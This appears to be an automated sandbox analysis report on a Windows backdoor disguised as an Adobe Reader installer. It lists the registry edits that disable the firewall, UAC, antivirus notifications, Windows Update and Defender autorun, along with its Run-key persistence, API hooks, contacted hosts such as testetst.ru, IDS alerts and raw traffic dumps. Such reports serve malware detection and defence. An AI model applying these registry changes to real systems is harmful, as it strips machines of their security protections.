[HKLM\SOFTWARE\Adobe\Acrobat Reader\10.0\Installer\Optimization]
"DefragStatus" = "1"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"AllUsers" = "1"

The Backdoor deletes the following value(s) in system registry:
The Backdoor disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Synchronizer"

The process MsiExec.exe:3076 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 1E B8 F8 B4 2D 63 E1 95 92 BC 42 53 21 8F 2E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Netscape\Netscape Navigator\Viewers]
"TYPE37" = "application/vnd.adobe.xdp"
"TYPE36" = "application/vnd.rmf"
"TYPE35" = "application/vnd.adobe.xfdf"
"TYPE34" = "application/vnd.fdf"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The Backdoor deletes the following registry key(s):

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
[HKLM\SOFTWARE\Adobe\Installer]
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Netscape\Netscape Navigator\Viewers]
"TYPE37"
"TYPE36"
"TYPE35"
"TYPE34"

The process %original file name%.exe:560 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 3B A7 9E 29 F6 DA 7F CC E3 20 1C 97 33 AB 7F"

The process vmacthlp.exe:892 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%System%\config\systemprofile\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process Adobe_Updater.exe:3548 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 87 1F AB 70 7A 28 F9 A3 CA C4 38 D0 19 76 95"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{67EA19A0-CCEF-11D0-8024-00C04FD75D13} {00000000-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 7C 6C 9C 7C B6 71 15 C0 83 47 D1 01"
"{40DD6E20-7C17-11CE-A804-00AA003CA9F6} {00000000-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 E6 6F DD 77 AA 81 66 C0 83 47 D1 01"
"{ECF03A33-103D-11D2-854D-006008059367} {00000000-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 E6 6F DD 77 56 97 3B C0 83 47 D1 01"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"

The Backdoor deletes the following value(s) in system registry:
The Backdoor disables automatic startup of the application by deleting the following autorun value:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"AdobeUpdater6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AdobeUpdater6"

The process setup.exe:2840 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 98 D5 B8 97 02 87 CA 57 68 F7 C0 87 FF 34 1F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process csslisog.exe:2160 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E 99 52 58 FD 7C CA 19 E3 8B 0C 28 E3 FF 27 0C"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"

"UacDisableNotify" = "1"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The following service is disabled:

[HKLM\System\CurrentControlSet\Services\wuauserv]
"Start" = "4"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CssLisog" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe"

The following service is disabled:

[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "4"

Firewall notifications are disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"

The Backdoor deletes the following value(s) in system registry:
The Backdoor disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"

The process csslisog.exe:580 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 AD 54 31 2C 7D 2F 58 02 D6 3D B6 A8 A7 2D 73"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"jfghdug_ooetvtgk" = "TRUE"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

"FirewallOverride" = "1"
"UacDisableNotify" = "1"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The following service is disabled:

[HKLM\System\CurrentControlSet\Services\wuauserv]
"Start" = "4"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SweGbgid" = "%Documents and Settings%\%current user%\Local Settings\Application Data\kqmtqgym\swegbgid.exe"

The following service is disabled:

[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "4"

Firewall notifications are disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"

The Backdoor deletes the following value(s) in system registry:
The Backdoor disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Backdoor installs the following user-mode hooks in USER32.dll:

TranslateMessage

The Backdoor installs the following user-mode hooks in WS2_32.dll:

WSASendTo
WSARecvFrom
WSASend
recv
WSARecv
send
closesocket
recvfrom
sendto

The Backdoor installs the following user-mode hooks in ntdll.dll:

LdrLoadDll
NtResumeThread
NtQueryDirectoryFile

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://e4937.d.akamaiedge.net/get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe
hxxp://a1953.d.akamai.net/pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe
hxxp://e6845.dscb1.akamaiedge.net/pca3.crl
hxxp://e6845.dscb1.akamaiedge.net/CSC3-2009-2.crl
hxxp://ardownload.adobe.com/pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe	213.133.184.112
hxxp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl	23.51.117.163
hxxp://fpdownload.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe
hxxp://crl.verisign.com/pca3.crl	23.51.117.163
google.com	216.58.209.206
testetst.ru	151.248.117.40

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
SURICATA STREAM FIN invalid ack
SURICATA STREAM FIN out of window

Traffic

GET /CSC3-2009-2.crl HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: csc3-2009-2-crl.verisign.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Server: Apache

ETag: "338dbffd2ca815f7c927187fc5dab96c:1451943184"

Last-Modified: Mon, 04 Jan 2016 21:00:03 GMT

Date: Tue, 05 Jan 2016 06:39:15 GMT

Transfer-Encoding:  chunked

Connection: keep-alive

Connection: Transfer-Encoding

Content-Type: application/pkix-crl
00006000..0.. 0......0...*.H........0..1.0...U....US1.0...U....VeriSig
n, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at htt
ps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signin
g 2009-2 CA..160104210003Z..160118210003Z0...0!.....V..t..'.F(z....121
202220203Z0!.... .;...9.7.......090826054212Z0!...\.)../F..^p..s...100
722072726Z0!......P....A.x......100708154305Z0!.......O#.`n.5j.9...100
930040708Z0!..../..8~p...h......091006052837Z0!.....(../L....--aK..091
029040207Z0!...aW.....B.!.0..t..090909121104Z0!...g,..4(vv....mJ_..100
514054218Z0!.....V.....(..-..p..090826162211Z0!....O..,J.N.n...Ly..091
[email protected]!.........}..Dt...!..090
922192227Z0!.......2l....7i..?..101109030426Z0!.....p%...l,AogP....100
523060224Z0!...,.P.C......*.....100303082219Z0!...NRPL.............100
413090225Z0!....1w....d.&..8....091026111702Z0!......F....e........090
608081352Z0!.....6..d6.7..4.....100924123027Z0!....$..*...s..&s....100
219210742Z0!......Q_.G..|.......091009145530Z0!........>..O...=72..
100616160934Z0!....Xlm$|".su.......090619194406Z0!......J)..E......C..
100922142243Z0!...D......u.y.Iy{k..101026130323Z0!...El...)>..W..&l
t;K...101004225456Z0!...p..wy.i.zc...X...091117001921Z0!.....,{..^....
......091203194409Z0!....B....d...*[email protected]!.......m. .V..
...~..101111134216Z0!...2.R.i.{..........091029071123Z0!...`F..q2..O.:
......100602074221Z0!...a{.-...@...'.....100723194022Z0!........fW.y.,
s.....101011182226Z0!....Um..}.8)........100324085953Z0!....,u.box
<<< skipped >>>

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:28 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:41 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:09 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:07 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:11 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:13 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:32 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

HEAD /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

HTTP/1.1 200 OK

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Length: 53784984

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:51 GMT

Connection: keep-alive
....


GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=0-1048575

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:51 GMT

Content-Range: bytes 0-1048575/53784984

Content-Length: 1048576

Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...........L...L...
L...k...K...k...X...E.N.U...E.X.....E._.....R._.O.......O...L...\...E.
R.V...R.O.M...E.J.M...RichL...........................PE..L......O....
..................0......5............@..........................05...
..S.4.....................................Lz.......0..../...........4.
.............................................5..@....................y
[email protected]...@........................... ..`.rdata..
............................@[email protected]...@........$..................@.
...rsrc...../..0..../.................@..@............................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U..Q.M..E...\2D..M........
..M...........].......U..Q.M..E....P.M........].......U..Q.M..E..@...]
................U..Q.M..M.......E....t..M.Q..*......E...].......U..Q.M
..E..M.........]..........U..Q.M..E.........].............U..Q.M..E...
......].............U..Q.M..E.P.M.Q.U.R.M........?.....]............U.
.Q.M..E.P.M..............]....U..Q.M..M.......E....t..M.Q.p....E...]..
........U..Q.M..E... 3D...].............U..Q.M..M.......E....t..M.Q.U)
......E...].......U..Q.M..E.P.M..m....E...].......U..Q.M..E.P.M..m
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=1048576-2097151

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:51 GMT

Content-Range: bytes 1048576-2097151/53784984

Content-Length: 1048576

Connection: keep-alive
.m..t..9......L.(.t..Z.u<Ma$}.#....t*.cX.;L.E.Et$..8v3...,HP.d..B..
..w?W...`rv$.e.$.w{...{....A..H5<=...9...*=..g.O...;-../.Ayy.P.\..E
............!..L.....0..Xs....:5...G.....i....'.Y../iw............&..c
..G.59J.bNd.~....<[email protected]..'6..!....hY....U..5..I 
.......J........$l.hT..$....[C...<.z3......=.)l..D..4.f..?.e.S.....
.L.C.........6....B..S.Q....c..-.p..Y.......P....n...k|..D.P!_.F. C=B.
 .e.....^Q.Vu.....X...jV...B.........Aq..?)...v.d5..w..;.sc.WCO.< .
."....d.#..l..V^.. ..D5......^.u....%.l...zn.q..vY. R..C.....N{D&.p...
[email protected][email protected]...*.v....R.-hL.#.2Q..@....]`.
q....7....e..._#3...0.....sL....^r...r9....Mn..n....8....W.z.....O...c
.\F.a.x..n.~......=~.G...yv....P...V...."9....BNu.C.m..2...yN....!0v..
b.WB8scr.D.)...m..u......T...y........P.g..ov.).xA..4p.j....L..u...H..
.....6..w...._TAO.D......|..s,..}[email protected]...:..Z...1...F..BK>..h.d
H.(6?....'....B.>.......Z....Q..Z..6.3.'|..5t.7.K..h...hR\Vd...4'..
...........i..pN.s...z..]...I.....r.Z^.\..=........P...Y..A H..G6TRL..
..Q.[.......S2y...p~G.*.j....4.06y....I..............5..x..........I^&
lt;.9n?..2............r.i..iMHWz...0...s....U..3.f.#C.!....h]bm..fV.z.
..Aj....D...v.?...M(....O..P.,._y.N.....!.S....9.....z1.n6...~.W...D..
8..Y.Eo.<W...;CP..}&n. ..X.Z..W..m'...>[email protected] ........bpr.
...)i.c.;....c...........w....Q...Q..U..:>6A.WB.q... ,*D.m.>..5.
}..e.t.G..m.x]n,D...6..|..\.......#O.....c..O.7N..2..8..n`...BMN`..z.o
U.....K-@.%..).K*.S...h.r.......t[.5D. ian..7.O<rh ...E........
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=2097152-3145727

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:51 GMT

Content-Range: bytes 2097152-3145727/53784984

Content-Length: 1048576

Connection: keep-alive
..r.....\h.Q.E..e.\..|..JP.........*..s...[..L.)0........CO..."....tG.
...Q.y9%...J.........y./...~.R[....o...i..@YJhi.(.~Z.).2#Z...(...:o...
..S9.p...C?j.../j...q.._.0.Ctb7}.MCR.....yI...'~%.......m...c.a.i.....
[email protected]...!..H.NVD)....s...........f...F
..&.....8G......L..0.H..58h....'I.X{.4#%q>...&.f..%............<
..NJ`..Xmi.....z~J\.Er.l.:BSV..%..lq......*l.........K......d....W..s.
6..<X...nyO s-....x...J......)..n..$.d).;.3h....0?.(0...7HlO. .8.-.
..{.C5.9....3j..8..c.[.o.....q4..Au...I^...$Q...U .g...WY.......c. ...
./..wh.k_. .P.............v.\[email protected]_F.X2...].K.tbx9.}[email protected].
EO.nt.X.V0 ....<g.%E.......^W.at.....6q.#..?s.X.....J'yY..-. .QX|..
U.u.....q....E.DY....:h..ck..V....|.....P.`.$..`l..Qf.70...`j..../..}.
ER.Y.....E......BV.=R`$...`s....cg.2.mI7_....e... ..P.....?..Of.B...3.
..2n.O..<..J\;RQ...B8..W........B._.........Ap......#....Nk...o..L!
.e?....Ky..$P;Ez...$.....\ .W..l.....U.D\.!W.?...t...vv...I[....t..<
;^p..AQ.1hL;.....y.K.'..D..Y4".K...#v.......Ho..~.G....M..?qh... . ..7
..?U....BG.1..@<U|t`5Y.w...ef..$......^.r...c&....g>...y....g..b
f...".b.....p..b.]......0....!x.e#oy>..{x.Z..._.s..C..~..9P.u.P.{'v
..y.Y-.....up5FRm..._../.Wg...%r..u`.t......x.W6...9>.e.Q.9.Z....m.
..LD.C..=.l|...."...[....... .7.e.X.z......D......J9@. f.....bL$.d*H..
..w.......H.DM....J@...@..&/..#...........4..T...*@....o[.A.{.M.E..
f..Z....2.|...7.hz..&.s....("F.k..G.K.../.qY.oAT....J.r.~'.b.@`......^
...X....../.2*..\qQ6. ..Q...O...........M..M..8?...,......S.....G.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=3145728-4194303

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:51 GMT

Content-Range: bytes 3145728-4194303/53784984

Content-Length: 1048576

Connection: keep-alive
hfYN.i.G.U*..eK.yn.,~.ym:.H....a. ...B..hcb...U..........G......27..C.
kFNZ.. .'.Q.....:<-......*..{/..........WV.I?....i..SI...U6..6.P...
q..)!...gDV=D*/...M....mJ{......V...%....UL...Q....[X.1..JI.....6Pm...
...x...y.>)..(P..q.......D.M..t..Z..@RL=......,....?.9........L....
.<^.1.v...3f..g.|...............b%.X..y..m.L....,.....r.]....[.....
?....j.!5Y....EMj..8....y.....u.AX5m^..t.N..}..9.O....}...\L.&Z.:J.5..
(f@. ..l.x!.jO....=...yz.aE..|[email protected]?$Eb..n......... .
.)..x|b8.."....)....Q.o.......#.-&A..6..@..'[email protected]'(..K..[.
&.A.........Z.......W../.%..Fj .e}A6.....>.l.....8Pi..od.....%IC.:C
i.7b..v....h....!x....."...6. ,.ES.5.6g....].k..`.X...$^.L.......M.K..
....?.....;.*.0.5.B..a......;..=*.\O.M.CQ....$.z..e..c.H....% .G.S...`
H?...\t.F.(<..$M..,)$.............%2.[.....^o.1.8`.{w ".. .H.......
..F..\1..c..f....D.4._.."...u....~O..>m^.ml...`Xg....^.S.r.......`.
...c .....A.U8i}....MsA..f.:z... >d.{m)....Fe..M.{N.;Q..&..........
h.}?...e...&....WI..^......8.....:[email protected].^b....z
.]v...e.x..F&<../@..&.c[.....G[..ke.#2..;<.q..:..77..)~.....?...
.....Ye.Z..?.....a...*...bQdG..e...a....lz.6.%jR.k"C....hK`......D-r..
.h--...R..j..gt........2..ozh/0...k&XWPZ7...._....)o>|.BQB.......q.
...M.B_.U.>).......S<....iZ.....`J..."..nm..q......./....D...d..
.<=.\...@!=yeK._?5.U.......5..kS.e....y.P.:.&i....9.Mp. ..8%..|.lM.
